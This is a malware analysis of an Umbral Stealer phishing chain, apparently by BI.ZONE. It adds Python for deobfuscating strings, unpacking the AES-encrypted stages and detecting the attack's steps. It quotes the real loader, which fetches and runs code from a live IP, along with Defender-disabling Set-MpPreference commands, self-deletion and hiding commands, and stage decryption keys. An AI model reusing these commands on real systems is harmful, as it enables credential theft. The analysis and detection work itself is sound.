Malware: everybody gets one. How open‑source software steals corporate passwords
The attackers chose a trivial but still effective delivery method: phishing emails. Somewhat atypically, the threat actors attached ISO images rather than Microsoft Office documents to distribute the stealer. An ISO file is an optical disc image; Windows 8 and later mount it natively, so double-clicking the attachment results in a new virtual drive on the system. In the Umbral Stealer case, the mounted drive contains an LNK file named План Рейдеров.lnk (Raider Plan.lnk), and opening this shortcut starts the malicious chain on the victim's computer.
More specifically, the LNK file launches PowerShell, which expands the wildcard path C:\W*\S*2\m*h?a.* to C:\Windows\System32\mshta.exe and runs it against a remote HTA file, MsMpEng.hta (named after the Windows Defender service binary), so that neither the string mshta nor the script body appears literally in the shortcut:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* 'http://46.175.149.13/MsMpEng.hta'
contains a VBS script that decrypts the array by subtracting 60,516 from each element, converts the array into a string, and runs it as a command:
powershell.exe" -ExecutionPolicy UnRestricted function ebdB($aLfxOjmGdGEUS, $zAiPEkMOejCWTcFA){[IO.File]::WriteAllBytes($aLfxOjmGdGEUS, $zAiPEkMOejCWTcFA)};function qxgMpLMjmzDowRlT($aLfxOjmGdGEUS){if($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74630,74638,74638))) -eq $True){rundll32.exe $aLfxOjmGdGEUS }elseif($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74642,74645,74579))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $aLfxOjmGdGEUS}elseif($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74639,74645,74635))) -eq $True){misexec /qn /i $aLfxOjmGdGEUS}else{Start-Process $aLfxOjmGdGEUS}};function hFmIYHdonzcFhY($RNyieqzJRlYpvCPkF){$LEwHqecvjAoI = New-Object (rdcviFZqRnwcdbvH @(74608,74631,74646,74576,74617,74631,74628,74597,74638,74635,74631,74640,74646));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$zAiPEkMOejCWTcFA = $LEwHqecvjAoI.DownloadData($RNyieqzJRlYpvCPkF);return $zAiPEkMOejCWTcFA};function rdcviFZqRnwcdbvH($jcTJtVjev){$wFHXnAkiLaZC=74530;$tRBkRaiWmupKBiJ=$Null;foreach($EgCggGKPy in $jcTJtVjev){$tRBkRaiWmupKBiJ+=[char]($EgCggGKPy-$wFHXnAkiLaZC)};return $tRBkRaiWmupKBiJ};function pjDerNYZPF(){$qKSYbuAHIBPwW = $env:AppData + '\';$ANpF = $qKSYbuAHIBPwW + 'Oilio.bat'; if (Test-Path -Path $ANpF){qxgMpLMjmzDowRlT $ANpF;}Else{ $oOOiiotnzQliM = hFmIYHdonzcFhY (rdcviFZqRnwcdbvH @(74634,74646,74646,74642,74588,74577,74577,74582,74584,74576,74579,74585,74583,74576,74579,74582,74587,74576,74579,74581,74577,74609,74635,74638,74635,74641,74576,74628,74627,74646));ebdB $ANpF $oOOiiotnzQliM;qxgMpLMjmzDowRlT $ANpF;};;;;}pjDerNYZPF;
The command downloads a file from the remote server and launches it according to its extension: a .dll is passed to rundll32.exe, a .ps1 to powershell.exe -ExecutionPolicy unrestricted -File, and an .msi to msiexec /qn /i (the script actually spells it misexec, so that branch would fail); anything else is started directly with Start-Process. The loader obfuscates its own strings with a second integer-array scheme, this time subtracting 74,530 from each element, and it first checks whether the target file already exists in %AppData%; if it does, the existing copy is launched without a new download.
In this case the file is Oilio.bat, fetched from http://46.175.149.13/Oilio.bat (the decoded URL array) and saved locally as C:\Users\%Username%\AppData\Roaming\Oilio.bat. Since .bat matches none of the three extension checks, it is run through Start-Process.
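The integer-array encoding above is simple enough to undo mechanically. The following Python script is an added example written for this page (it is not BI.ZONE's tooling or the malware's own code): it finds the decoder function by its [char]($x-$y) idiom, recovers the offset constant, and replaces every decoder call with the plaintext literal, so the extension checks and the download URL fall out directly. SCRIPT is a constructed excerpt of the loader quoted above, keeping only the decoder and three of its call sites.

```python
"""Deobfuscate the integer-array string encoding used by the PowerShell loader."""
import re

# Constructed excerpt of the loader quoted above: the decoder function and three of
# its call sites (the '.dll' check, the WebClient type name and the download URL).
SCRIPT = r"""function rdcviFZqRnwcdbvH($jcTJtVjev){$wFHXnAkiLaZC=74530;$tRBkRaiWmupKBiJ=$Null;foreach($EgCggGKPy in $jcTJtVjev){$tRBkRaiWmupKBiJ+=[char]($EgCggGKPy-$wFHXnAkiLaZC)};return $tRBkRaiWmupKBiJ};
if($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74630,74638,74638))) -eq $True){rundll32.exe $aLfxOjmGdGEUS}
$LEwHqecvjAoI = New-Object (rdcviFZqRnwcdbvH @(74608,74631,74646,74576,74617,74631,74628,74597,74638,74635,74631,74640,74646));
$oOOiiotnzQliM = hFmIYHdonzcFhY (rdcviFZqRnwcdbvH @(74634,74646,74646,74642,74588,74577,74577,74582,74584,74576,74579,74585,74583,74576,74579,74582,74587,74576,74579,74581,74577,74609,74635,74638,74635,74641,74576,74628,74627,74646));"""

# A function whose body (without crossing into the next function) contains
# [char]($x-$y) is the string decoder; $y holds the offset constant.
DECODER_RE = re.compile(
    r"function\s+(?P<name>\w+)\s*\([^)]*\)\s*\{(?:(?!\bfunction\b).)*?"
    r"\[char\]\(\$\w+\s*-\s*\$(?P<offvar>\w+)\)",
    re.S,
)


def find_decoder(script):
    """Return (decoder function name, offset). Raises ValueError if the idiom is absent."""
    m = DECODER_RE.search(script)
    if not m:
        raise ValueError("no [char]($x-$y) decoder found")
    off = re.search(r"\$" + re.escape(m.group("offvar")) + r"\s*=\s*(\d+)", script)
    if not off:
        raise ValueError("decoder offset constant not found")
    return m.group("name"), int(off.group(1))


def decode_array(values, offset):
    """Apply the loader's scheme: each element minus the offset is one character."""
    return "".join(chr(v - offset) for v in values)


def deobfuscate(script):
    """Replace every `decoder @(n,n,...)` call with a PowerShell single-quoted literal."""
    name, offset = find_decoder(script)
    call_re = re.compile(r"\b" + re.escape(name) + r"\s+@\(\s*([\d,\s]+?)\s*\)")

    def repl(m):
        values = [int(v) for v in m.group(1).split(",")]
        text = decode_array(values, offset)
        return "'" + text.replace("'", "''") + "'"

    return call_re.sub(repl, script)


URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def extract_urls(text):
    """Pull URLs out of the cleaned script (the C2/download indicators)."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    clean = deobfuscate(SCRIPT)
    print(clean)
    print("URLs:", extract_urls(clean))
```

The decoder is located by shape rather than by name, so the same script works on a fresh sample whose function names were regenerated; only the [char]($x-$y) construction and the assignment of the constant need to survive.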
The BAT file copies powershell.exe from C:\Windows\System32 to C:\Users\%Username%\AppData\Roaming\Oilio.bat.exe (a renamed copy sidesteps detections keyed on the process name powershell.exe) and adds that path to the Windows Defender exclusions:
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\%username%\AppData\Roaming\Oilio.bat.exe'
It then runs a script that extracts a Base64 string from Oilio.bat, decodes it into bytes, decrypts them with AES-256-CBC using the key `AA778CAE81AA8E082B9DC1B4C43D7170A89749703CE570C71028ABF2EAC4D7E3` and the initialization vector (IV) `81C41ECFD66FEDE6888118B6CF1A4DF8`, and finally decompresses the result with GZip.
The resulting .NET binary checks whether it is running in a virtual machine (VMware, VirtualBox, Hyper-V or QEMU) by inspecting the Manufacturer and Model fields returned by the WMI query Select * from Win32_ComputerSystem, and checks whether a debugger is attached. If neither is the case, execution continues: the next stage, Payload.exe, is extracted from the PE resources, decrypted with the AES-256-CBC key `214E766E9025CDD3442F90E7C36E41A80A7B4DE93EACD4B17D10F083935EAD32` and the IV `83E8EF88AFB1FD9168733393A3268AFE`, decompressed with GZip, and executed.
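Both stages above (the blob inside Oilio.bat and the Payload.exe resource) use the same Base64, AES-256-CBC, GZip layering with different keys, so one unpacker serves both. The Python below is an added example for this page, not BI.ZONE's or the malware author's code; it needs the cryptography package. Two things are assumptions because the page does not state them: PKCS7 padding (the .NET default), and that Oilio.bat carries its blob as a single long Base64 run. The pack_stage_b64 helper and the fake_stage bytes exist only to build test input.

```python
"""Unpack an AES-256-CBC + GZip stage of the loader described above."""
import base64
import gzip
import re
import zlib
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Key/IV pairs quoted in the analysis: the first unpacks the Base64 blob inside
# Oilio.bat, the second the Payload.exe resource inside the resulting .NET binary.
STAGE_KEYS = {
    "Oilio.bat": (
        bytes.fromhex("AA778CAE81AA8E082B9DC1B4C43D7170A89749703CE570C71028ABF2EAC4D7E3"),
        bytes.fromhex("81C41ECFD66FEDE6888118B6CF1A4DF8"),
    ),
    "Payload.exe": (
        bytes.fromhex("214E766E9025CDD3442F90E7C36E41A80A7B4DE93EACD4B17D10F083935EAD32"),
        bytes.fromhex("83E8EF88AFB1FD9168733393A3268AFE"),
    ),
}


def aes_cbc_decrypt(data, key, iv):
    """AES-CBC decrypt and strip PKCS7 padding. The page does not name the padding
    mode; PKCS7 is what .NET's AES classes use unless told otherwise (assumption)."""
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(data) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def aes_cbc_encrypt(data, key, iv):
    """Inverse of aes_cbc_decrypt; used here only to build test input."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(data) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return enc.update(padded) + enc.finalize()


def unpack_stage_b64(b64_text, key, iv):
    """Base64 -> AES-256-CBC -> GZip -> next-stage bytes.
    A wrong key/IV fails at the padding check or the gzip header instead of
    yielding silent garbage, so the caller gets a clear ValueError."""
    try:
        return gzip.decompress(aes_cbc_decrypt(base64.b64decode(b64_text), key, iv))
    except (ValueError, OSError, EOFError, zlib.error) as exc:
        raise ValueError(f"stage did not decrypt cleanly: {exc}") from exc


def pack_stage_b64(payload, key, iv):
    """Build a stage blob by running the layers in reverse (test helper, assumed builder behaviour)."""
    return base64.b64encode(aes_cbc_encrypt(gzip.compress(payload), key, iv)).decode()


B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def extract_base64_blob(bat_text):
    """Return the longest Base64 run in a batch file (assumption: the blob is one
    long run; the page does not show how Oilio.bat stores it)."""
    runs = B64_RUN.findall(bat_text)
    if not runs:
        raise ValueError("no Base64 blob found")
    return max(runs, key=len)


def is_pe(data):
    """Sanity check on the output: a PE file starts with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    key, iv = STAGE_KEYS["Oilio.bat"]
    fake_stage = b"MZ" + bytes(range(256)) * 8  # constructed stand-in for the .NET loader
    bat = 'set "blob=' + pack_stage_b64(fake_stage, key, iv) + '"\r\n'  # constructed Oilio.bat
    out = unpack_stage_b64(extract_base64_blob(bat), key, iv)
    print("PE:", is_pe(out), "bytes:", len(out))
```

With a real sample you would feed extract_base64_blob the contents of Oilio.bat and then run unpack_stage_b64 a second time on the resource pulled from the decrypted .NET binary with the "Payload.exe" key pair; is_pe is the quick check that the chosen key and IV were the right ones.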
The file obtained through this process is Umbral Stealer itself. It can add the path of its own executable to the Defender exclusions and, through Set-MpPreference, disable real-time monitoring, IOAV protection, script scanning and the intrusion prevention system, turn off controlled folder access, switch network protection to audit mode, and stop cloud (MAPS) reporting and sample submission:
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
If the stealer is not running with administrative privileges (which Set-MpPreference requires), it prompts the user to grant them.
The stealer can delete itself with the following command, where ping localhost serves as a short delay so that the executable is no longer in use when del runs:
cmd.exe" /c ping localhost && del /F /A h [path to the body of the file]
The stealer can also add attributes “Hidden” and “System” to its body:
attrib.exe +h +s [path to the body of the file]
To collect information about the compromised system, Umbral uses WMI. For instance, to get the system’s unique identifier, the malware runs the following command:
wmic csproduct get uuid
To obtain information about the video controller, Umbral uses this command:
wmic path win32_VideoController get name
The system’s memory size is collected by means of:
wmic computersystem get totalphysicalmemory
To retrieve data on the OS version being used, the stealer executes the following command:
wmic os get Caption
Umbral leverages PowerShell to extract information about the processor type from the respective registry entry:
powershell.exe Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER
To get information about the geolocation and IP address of the compromised system, the stealer accesses the following URL:
http://ip-api[.]com/json/?fields=225545
To persist on the compromised system, the stealer copies itself into the Startup (autorun) folder under a random name with the .scr extension.
Umbral enables its operators to retrieve authentication data from the following browsers and applications:
- Brave
- Chrome
- Chromium
- Comodo
- Edge
- Epic Privacy
- Iridium
- Opera
- Opera GX
- Slimjet
- UR Browser
- Vivaldi
- Yandex
- Roblox
- Minecraft
- Discord
The stealer can also take screenshots of the desktop and capture images from the computer's webcam.
The collected data is saved into an archive named Umbral-{Environment.MachineName}.zip and exfiltrated through Discord webhooks.
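Almost every step described above leaves a command line or a URL behind: the wildcard path that reaches mshta, the renamed powershell.exe copy, the Add-MpPreference exclusion, the Set-MpPreference tampering, the ping-then-del self-deletion, attrib +h +s, the wmic fingerprinting, the registry read of PROCESSOR_IDENTIFIER, the ip-api.com lookup and the Discord webhook. The script below is an added example for this page (not BI.ZONE's detection content) that turns those indicators into rules and runs them over constructed process-creation and proxy records; the hostnames, user name, file names and webhook ID in EVENTS are made up, and the masquerade check assumes the log source records the PE's OriginalFileName, as Sysmon event 1 does.

```python
"""Detection rules for the command-line and network indicators of the chain above,
run over constructed process-creation and proxy records."""
import re
from collections import defaultdict

# Regexes over the process command line.
COMMAND_RULES = {
    "wildcard_path_execution": re.compile(r"\$env:\w*:?\\[^\s']*[*?]", re.I),
    "defender_exclusion": re.compile(r"\bAdd-MpPreference\b.*-ExclusionPath\b", re.I),
    "defender_tamper": re.compile(
        r"\bSet-MpPreference\b.*-(?:DisableRealtimeMonitoring|DisableIOAVProtection|"
        r"DisableScriptScanning|DisableIntrusionPreventionSystem|MAPSReporting|"
        r"SubmitSamplesConsent)\b", re.I),
    "self_delete": re.compile(r"\bping\s+(?:localhost|127\.0\.0\.1)\b.*&&\s*del\b", re.I),
    "hide_attributes": re.compile(r"\battrib(?:\.exe)?\b(?=.*\+h\b)(?=.*\+s\b)", re.I),
    "wmic_recon": re.compile(
        r"\bwmic\b.*\b(?:csproduct\s+get\s+uuid|win32_videocontroller|"
        r"totalphysicalmemory|os\s+get\s+caption)\b", re.I),
    "cpu_from_registry": re.compile(r"Session Manager\\{1,2}Environment.*PROCESSOR_IDENTIFIER", re.I),
}
# Regexes over the requested URL (proxy / DNS / EDR network events).
URL_RULES = {
    "geo_lookup": re.compile(r"\bip-api\.com/json\b", re.I),
    "discord_webhook": re.compile(r"\bdiscord(?:app)?\.com/api/webhooks/", re.I),
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STEALER = r"C:\Users\alice\AppData\Roaming\svchost.scr"  # constructed random .scr name

# Constructed records: ws01 replays the chain, ws02 is ordinary admin activity.
EVENTS = [
    {"host": "ws01", "image": PS, "original_file_name": "PowerShell.EXE",
     "cmdline": r"powershell.exe . $env:C:\W*\S*2\m*h?a.* 'http://46.175.149.13/MsMpEng.hta'"},
    {"host": "ws01", "image": r"C:\Users\alice\AppData\Roaming\Oilio.bat.exe",
     "original_file_name": "PowerShell.EXE",
     "cmdline": r"Oilio.bat.exe Add-MpPreference -ExclusionPath 'C:\Users\alice\AppData\Roaming\Oilio.bat.exe'"},
    {"host": "ws01", "image": PS, "original_file_name": "PowerShell.EXE",
     "cmdline": r"powershell.exe Set-MpPreference -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -MAPSReporting Disabled -SubmitSamplesConsent NeverSend"},
    {"host": "ws01", "image": r"C:\Windows\System32\cmd.exe", "original_file_name": "Cmd.Exe",
     "cmdline": r"cmd.exe /c ping localhost && del /F /A h " + STEALER},
    {"host": "ws01", "image": r"C:\Windows\System32\attrib.exe", "original_file_name": "ATTRIB.EXE",
     "cmdline": r"attrib.exe +h +s " + STEALER},
    {"host": "ws01", "image": r"C:\Windows\System32\wbem\WMIC.exe", "original_file_name": "wmic.exe",
     "cmdline": "wmic csproduct get uuid"},
    {"host": "ws01", "image": PS, "original_file_name": "PowerShell.EXE",
     "cmdline": r"powershell.exe Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER"},
    {"host": "ws01", "image": STEALER, "url": "http://ip-api.com/json/?fields=225545"},
    {"host": "ws01", "image": STEALER, "url": "https://discord.com/api/webhooks/000000000000000000/constructed"},
    {"host": "ws02", "image": r"C:\Windows\System32\wbem\WMIC.exe", "original_file_name": "wmic.exe",
     "cmdline": "wmic qfe list"},
    {"host": "ws02", "image": PS, "original_file_name": "PowerShell.EXE",
     "cmdline": "powershell.exe Get-Process"},
]


def evaluate(event):
    """Return the names of every rule a single record triggers."""
    hits = []
    cmd = event.get("cmdline", "")
    hits += [name for name, rx in COMMAND_RULES.items() if rx.search(cmd)]
    url = event.get("url", "")
    hits += [name for name, rx in URL_RULES.items() if rx.search(url)]
    # The copied/renamed powershell.exe keeps its PE OriginalFileName, so the
    # image name and the original name disagree.
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    if event.get("original_file_name", "").lower() == "powershell.exe" and image != "powershell.exe":
        hits.append("masqueraded_powershell")
    return hits


def triage(events, threshold=3):
    """Collect distinct rule hits per host; hosts at or above the threshold are flagged.
    Single hits (one wmic query, one attrib) are common in admin work; the stacking is the signal."""
    per_host = defaultdict(set)
    for e in events:
        per_host[e["host"]].update(evaluate(e))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


if __name__ == "__main__":
    for host, rules in triage(EVENTS).items():
        print(host, "->", ", ".join(rules))
```

The threshold matters more than any single regex: wmic csproduct get uuid or attrib +h alone will fire on inventory scripts and installers, whereas a host that also disables real-time monitoring, excludes a path under AppData and posts to a Discord webhook within the same window is a different conversation.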
Our experience in investigating stealer incidents shows that attackers often use email to gain initial access to corporate networks. To protect your email communications, you can apply specialized solutions that filter out unwanted correspondence. One such solution is BI.ZONE CESP. It weeds out illegitimate email traffic by carefully examining every message going to your inbox. BI.ZONE CESP uses more than 600 filtering rules based on machine learning and on statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of legitimate emails.
To stop a cyberattack at any stage of its life cycle, we also recommend delegating cyber threat detection, response, and prevention to experts. One way to do it is through BI.ZONE TDR, a service that combines a set of our proprietary technologies with insights from the BI.ZONE Cyber Threat Intelligence team.